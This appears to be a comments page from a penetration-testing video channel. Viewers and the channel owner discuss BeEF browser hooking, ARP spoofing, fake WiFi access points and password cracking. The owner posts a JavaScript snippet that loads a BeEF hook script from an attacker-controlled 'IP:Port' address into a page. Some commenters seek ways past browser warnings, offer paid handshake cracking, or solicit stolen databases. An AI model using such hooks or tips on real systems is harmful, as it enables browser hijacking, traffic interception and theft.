xenjin450

xenjin450

CTO/CoFounder PurpleGenAI(purplegenai.com/)
Penetration-Testing Enthusiast (CyberSecurity Education & Awareness)
Developer-Github www.github.com/xenjin450

Пікірлер

  • @SHECHEMJCGMVINUKONDA
    @SHECHEMJCGMVINUKONDA7 күн бұрын

    dns redirect does not work for me no matte

  • @ITInsights101
    @ITInsights1017 күн бұрын

    How to get the Instance username: ec2-user isn;t working with me

  • @mostafamatrix4822
    @mostafamatrix482217 күн бұрын

    You are amazing man, complete and accurate explanation and great result. The best explanation I've found so far on KZread

  • @lightsploit
    @lightsploitАй бұрын

    I want to send and modify udp packets how do I do that?

  • @xenjin450
    @xenjin450Ай бұрын

    SOCK_STREAM -> SOCK_DGRAM in your python code

  • @Toxic_Talons
    @Toxic_TalonsАй бұрын

    is whonix secure? if i use is in kali using NAT?

  • @matthewlathum9312
    @matthewlathum9312Ай бұрын

    How are you installed wifi indicator, I have Kali 2024.2 and cannot figure out how to have such a view of all available wifi around me!

  • @beglora
    @begloraАй бұрын

    It works well, except for one specific issue: once connected to the fake AP, most browsers immediately display security warnings, which thwart the attack. Is there a way to bypass security warnings to ensure success?

  • @qutaiba1994
    @qutaiba19942 ай бұрын

    I need resources to study Linux and how to protect and hack. Can you help me?

  • @qutaiba1994
    @qutaiba19942 ай бұрын

    Thank you 👍 from iraq

  • @ahmeddubox
    @ahmeddubox2 ай бұрын

    My brother, is there a way to encrypt the passcode for the Jaahu, or to reactivate the passcode?

  • @ahmeddubox
    @ahmeddubox2 ай бұрын

    My brother, is there a way to encrypt the passcode for the Jaahu, or to reactivate the passcode?

  • @ninoachay5739
    @ninoachay57392 ай бұрын

    If I do the Mac change command all together I get an error if I do it in pieces with out the && it works and I lose connection everytime.

  • @xenjin450
    @xenjin4502 ай бұрын

    are you using a wireless-adapter? or a wifi-chip card that is built inside your laptop . You would need a kali-linux compatible wireless-adapter .

  • @ninoachay5739
    @ninoachay57392 ай бұрын

    @xenjin450 when I tried this I did not have my adapter plugged in. I saw your video and tried it. Maybe that was the issue?

  • @xenjin450
    @xenjin4502 ай бұрын

    @@ninoachay5739 yeah , when it comes to wireless spoofing or any kind of techniques never use your laptops wired card . use a wireless adapter

  • @TNTSecurite
    @TNTSecurite3 ай бұрын

    Trying to access my beef panel with my public IP and port 3000 but It can't be reached. The port 3000 is also forwarded in the security group. Have you done anything else to be able to access your admin panel ? Thanks

  • @xenjin450
    @xenjin4503 ай бұрын

    In this folder /usr/share/beef-xss/config.yaml there is a beef config file . Watch at 7:22 , i enabled it over the public . Also dont forget to port-forward the websocket port numbers inside the beef-xss config.yaml . In the inbound security group. Than try again with when u cd inside /usr/share/beef-xss do ./beef start . If that doesnt work maybe one of your security-group points to the wrong EC2 instance / VPC of yours and you need to change something up in the AWS-Cloud . 👍🏻 if you still have the problem tell me, im happy to help .

  • @TNTSecurite
    @TNTSecurite3 ай бұрын

    @@xenjin450 I had to re-create my VPS and it's now working. as a suggestion for security reason you should only allowed your IP to access the admin panel on port 3000. You should now make another video on how to keep the hook and what kind of attacks could be done with Beef. Thanks again 🙂

  • @xenjin450
    @xenjin4503 ай бұрын

    @@TNTSecuriteyes no problem and thanks for the suggestion 👍🏻💯i just wanted to keep it simple in this video not go into security . But just show as how we can make it work basically .

  • @thekingdomelites1801
    @thekingdomelites18013 ай бұрын

    Nice one my man .... This is really enlightening. Please we need more

  • @xenjin450
    @xenjin4503 ай бұрын

    More videos will definitely come 👍🏻💯

  • @xenjin450
    @xenjin4503 ай бұрын

    Timeline: 00:00 - Introduction 00:33 - Installing Kali-Linux On AWS-EC2 Instance Server 06:48 - Installing apache2 & beef-xss setting up the enviroment 07:22 - Configuring beef-xss to work over the Cloud(WAN) 09:26 - Port-Forwarding the EC2-Kali Linux Instance for Internet Reachability 11:31 - Testing Beef-XSS 13:36 - Embedding Beef-Hook inside Apache2 HTML-Web Index-Page 16:03 - Embedding Beef-Hook inside Javascript-Code File 18:42 - Secure The World ✔️(CyberSecurity)

  • @xenjin450
    @xenjin4503 ай бұрын

    Code At The End As The Screen Was Positioned Wrong: (function() { var script = document.createElement(‘script’); script.src = ‘IP:Port/hook.js’; document.head.appendChild(script); })();

  • @anandvenkatraman8983
    @anandvenkatraman89833 ай бұрын

    we are so back

  • @xenjin450
    @xenjin4503 ай бұрын

    🙏🏻

  • @anandvenkatraman8983
    @anandvenkatraman89833 ай бұрын

    www.W

  • @abdool4374
    @abdool43743 ай бұрын

    Miss you bro ❤

  • @xenjin450
    @xenjin4503 ай бұрын

    Thanks 🙏🏻

  • @xenjin450
    @xenjin4503 ай бұрын

    Amazon-Web Service: aws.amazon.com/free

  • @tnunited2436
    @tnunited24363 ай бұрын

    hi can i send you my .cap file and you crack it for me? my wordlist on aircrack-ng can't find password. I'm willing to pay thanks

  • @HenkTrapstar
    @HenkTrapstar3 ай бұрын

    hi i can crack the cap file for you but how much money are you willing to pay

  • @ggelosstavrou9117
    @ggelosstavrou91174 ай бұрын

    Https downgrade and dns redirect does not work for me no matter how hard I try . Can you make a new video about it working with the current data ( browsers etc )?

  • @bcbc2015
    @bcbc20154 ай бұрын

    very good content!. does this also work for imperva WAF? thanks a lot

  • @ggelosstavrou9117
    @ggelosstavrou91175 ай бұрын

    It doesn’t work for me… it directs them to the original page not the page I want to … do you know why?

  • @jaramaster1498
    @jaramaster14985 ай бұрын

    Same thing for me

  • @jaramaster1498
    @jaramaster14985 ай бұрын

    Maybe some mind of security on the router

  • @LenovoTester
    @LenovoTester3 ай бұрын

    It depends on various factors. Popular updated browsers tend to force overload those http connections to https or not open at all. But it still works on less popular or older browsers like Internet Explorer

  • @ggelosstavrou9117
    @ggelosstavrou91175 ай бұрын

    How to make it work for https ?

  • @ggelosstavrou9117
    @ggelosstavrou91175 ай бұрын

    How can you make beef work not locally ?

  • @xenjin450
    @xenjin4505 ай бұрын

    You need to port-forward the ports used to open the beef web-panel .. specifically port 3000 . You can use a VPS server and setup the firewall to open the specific ports for your beef-hook / web-panel .

  • @ggelosstavrou9117
    @ggelosstavrou91175 ай бұрын

    @@xenjin450 is there any other way , using ngrok , Serveo or any other tunnel services ??

  • @ggelosstavrou9117
    @ggelosstavrou91175 ай бұрын

    Why in the targets you typed the gateway and the victim ip twice ?

  • @xenjin450
    @xenjin4505 ай бұрын

    Its to spoof the gateway-IP and the targets device . So you put yourself as the gateway and can sniff out the network-traffic from the target

  • @ggelosstavrou9117
    @ggelosstavrou91175 ай бұрын

    @@xenjin450 yeah but is it necessary to type the targets twice ??? Couldn’t you type gateway and target ip only once??

  • @xenjin450
    @xenjin4505 ай бұрын

    @@ggelosstavrou9117 yeah you are right … but it is more efficient and works usually in my case better like that . Else the target device always doesnt have connection from my experience .

  • @dsawyer8
    @dsawyer85 ай бұрын

    One of the better vids I've seen. Thank you for doing it right. But explain to the script kiddies how to protect themselves first so they don't end up in cuffs. You know what I mean.

  • @vinayprajapati2750
    @vinayprajapati27506 ай бұрын

    Where does malware.exe comes from ?

  • @GhaithAlMasri-cv3dg
    @GhaithAlMasri-cv3dg6 ай бұрын

    i found the origin ip address for my site but when i am trying to send data for it or get data from it it dont give me anything the page is loading the same as the protected one but i filled the form and hit send button it should send an email for me but i didnt recieve any email can u tell me why ?

  • @nicksunny100
    @nicksunny1007 ай бұрын

    subscribed

  • @xenjin450
    @xenjin4507 ай бұрын

    Thanks alot

  • @nicksunny100
    @nicksunny1007 ай бұрын

    Do more interesting videos @@xenjin450

  • @gauravdehare9062
    @gauravdehare90627 ай бұрын

    Thank you so much 👍❤

  • @SkullCrusher_05
    @SkullCrusher_057 ай бұрын

    Hey, thnx for showing the usage of this tool. When I start the captive portal attack, It won't deauth (jam) all the clients on the target network. Any idea how to fix this?

  • @xenjin450
    @xenjin4507 ай бұрын

    Try the other options than mdk3 like the typical airreplay , else maybe its your wireless wifi card that has the problem of not being able to inject wireless deauth packets .

  • @rajeevpuri8319
    @rajeevpuri83197 ай бұрын

    RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q={search}" ^

  • @nayab8704
    @nayab87048 ай бұрын

    Can I use another router as a WiFi adapter?

  • @xenjin450
    @xenjin4507 ай бұрын

    As a Access point ( AP ) ? Yes you can use . But you would need to know how to set it up , but its better to use a Alfa wireless adapter to host the Fake-AP .

  • @MooCowBlueKites
    @MooCowBlueKites8 ай бұрын

    after installing anonsurf and then running it on kali linux using the anonsurf start command I don't seem to have any working proxies as I can't browse anywhere nor ping an fqdn. Have you seen this before?

  • @xenjin450
    @xenjin4508 ай бұрын

    this shouldnt be a problem usually, but try anonsurf stop or anonsurf restart . Else try to look into the configuration file and see what you can change there from the proxies. i think anonsurf uses the port 9050 or 9051 ...just look at the code and see how you can solve it .

  • @kafihacker
    @kafihacker8 ай бұрын

    niceee ❤❤❤❤❤

  • @xenjin450
    @xenjin4508 ай бұрын

    Thanks 🙏

  • @xudayberdijumaqulov6481
    @xudayberdijumaqulov64818 ай бұрын

    where I can donwload password.exe file give a link

  • @KaatibAcademy
    @KaatibAcademy8 ай бұрын

    thanks man, you did greate job, keep hunting.

  • @user-yz4rx5xz8f
    @user-yz4rx5xz8f8 ай бұрын

    Sorry to bother you, would you like to help me get some databases of Chinese websites? I can pay you.

  • @mezbaahmedmaruf2804
    @mezbaahmedmaruf28048 ай бұрын

    Can i piped crunch with jhon the ripper?

  • @xenjin450
    @xenjin4508 ай бұрын

    yeah should work

  • @davigoudard5425
    @davigoudard54259 ай бұрын

    My system gets stuck at the 'starting captive portal access point service' part. I've tried with different handshakes and different Wi-Fi networks, but it still stops at this point without creating the access point."

  • @jeffinaughe3448
    @jeffinaughe34489 ай бұрын

    bro after installing anonsurf am having curl 6 error on my taminal.. and am unable to use the firefox browser 😢please help

  • @releasedmike
    @releasedmike8 ай бұрын

    I had the same problem did you fix it

  • @SAJIB44
    @SAJIB449 ай бұрын

    Wifi admin panle password show tips please. 🎉

  • @rahulramteke3338
    @rahulramteke33389 ай бұрын

    FYI, we can use proxychains4, proxychains-ng and WhonixVM, independently or chained together

  • @LAM-mu1ez
    @LAM-mu1ez9 ай бұрын

    how about cdnetworks ?

  • @soulvideos7834
    @soulvideos783410 ай бұрын

    H1 not accept origin ip I reported 8 origin ip to single target 🥲🥲

  • @KhizarAli-ed6sp
    @KhizarAli-ed6sp10 ай бұрын

    Thanks sir

  • @saddambukhari75
    @saddambukhari7510 ай бұрын

    why we need to cloning this packet where they really used how it beneficial for us

  • @xenjin450
    @xenjin45010 ай бұрын

    Tools/Code Used: Wireshark:www.wireshark.org/ Hex-Cloner:github.com/xenjin450/sendhexn... Python-Socket Libraries: docs.python.org/3/library/soc... Python-IDE/Language: www.python.org/